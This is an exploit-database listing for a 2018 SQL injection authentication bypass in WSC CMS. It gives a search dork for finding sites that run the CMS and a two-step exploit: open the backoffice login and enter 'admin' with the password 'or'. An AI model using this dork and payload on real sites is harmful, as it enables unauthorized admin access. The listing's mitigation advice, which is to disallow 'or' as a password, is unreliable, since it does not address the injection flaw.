WSC CMS (Bypass) SQL Injection Vulnerability

vendor:

WSC CMS

by:

Phenom

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: WSC CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2018

WSC CMS (Bypass) SQL Injection Vulnerability

This vulnerability allows an attacker to bypass authentication and gain access to the admin panel of the WSC CMS. By entering 'or' as the password, the attacker can bypass the authentication and gain access to the admin panel.

Mitigation:

To mitigate this vulnerability, the application should use strong authentication mechanisms and should not allow the use of 'or' as a password.

Source

Exploit-DB raw data:

------------------------------------------------------
------------------------------------------------------

 _____  _                                
|  __ \| |                               
| |__) | |__   ___ _ __   ___  _ __ ___  
|  ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \              
| |    | | | |  __/ | | | (_) | | | | | |             
|_|    |_| |_|\___|_| |_|\/__/|_| |_| |_|             

                                                      
------------------------------------------------------
------------------------------------------------------

############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################
#
#       Author : Phenom
#       
#       mail : sys.phenom.sys[at]gmail[dot]com
#
#       Dork : Realizzato con WSC CMS  by Dynamicsoft 
#
################################################################################################

####### Exploit ################################################################################
#
#     1- http://server/public/backoffice 
# 
#     2- login with "admin" as user name and 'or' as password 
#
################################################################################################